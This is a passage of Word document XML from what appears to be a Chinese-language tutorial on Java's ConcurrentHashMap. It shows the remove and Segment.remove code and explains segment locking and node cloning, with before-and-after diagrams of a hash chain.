          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>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b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> V remove(Object key) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>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hash = hash(key.hashCode());  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> segmentFor(hash).remove(key, hash, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>null</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9"/>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整个操作是先定位到段，然后委托给段的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>remove</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>操作。当多个删除操作并发进行时，只要它们所在的段不相同，它们就可以同时进行。下面是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Segment</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>remove</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>方法实现：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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V remove(Object key, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> hash, Object value) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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lock();  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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try</w:t>
      </w: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0"/>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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> c = count - </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>1</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0"/>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HashEntry&lt;K,V&gt;[] tab = table;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> index = hash &amp; (tab.length - </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>1</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0"/>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HashEntry&lt;K,V&gt; first = tab[index];  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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HashEntry&lt;K,V&gt; e = first;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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while</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (e != </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> &amp;&amp; (e.hash != hash || !key.equals(e.key)))  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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e = e.next;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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0"/>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V oldValue = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>null</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0"/>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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (e != </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>null</w:t>
      </w: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0"/>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V v = e.value;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (value == </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> || value.equals(v)) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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oldValue = v;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>// All entries following removed node can stay</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0"/>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color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>// in list, but all preceding ones need to be</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0"/>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color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>// cloned.</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0"/>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++modCount;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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HashEntry&lt;K,V&gt; newFirst = e.next;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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for</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (HashEntry&lt;K,V&gt; p = first; p != e; p = p.next)  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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newFirst = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> HashEntry&lt;K,V&gt;(p.key, p.hash,  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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newFirst, p.value);  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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tab[index] = newFirst;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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count = c; </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>// write-volatile</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0"/>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0"/>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0"/>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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> oldValue;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>finally</w:t>
      </w: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0"/>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unlock();  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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0"/>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r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>整个操作是在持有段锁的情况下执行的，空白行之前的行主要是定位到要删除的节点</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。接下来，如果不存在这个节点就直接返回</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，否则就要将</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>前面的结点复制一遍，尾结点指向</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的下一个结点。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>后面的结点不需要复制，它们可以重用。下面是个示意图，我直接从</w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="006699"/>
            <w:kern w:val="0"/>
            <w:sz w:val="19"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>这个网站</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>上复制的（画这样的图实在是太麻烦了，如果哪位有好的画图工具，可以推荐一下）。</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lastRenderedPageBreak/>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删除元素之前：</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noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4580890" cy="758825"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="24" name="图片 10" descr="a hash chain before an element is remov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 hash chain before an element is removed"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4580890" cy="758825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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删除元素</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>之后：</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noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4459605" cy="1587500"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="25" name="图片 11" descr="the chain with element 3 remov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the chain with element 3 removed"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4459605" cy="1587500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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第二个图其实有点问题，复制的结点中应该是值为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的结点在前面，值为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的结点在后面，也就是刚好和原来结点顺序相反，还好这不影响我们的讨论。</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整个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
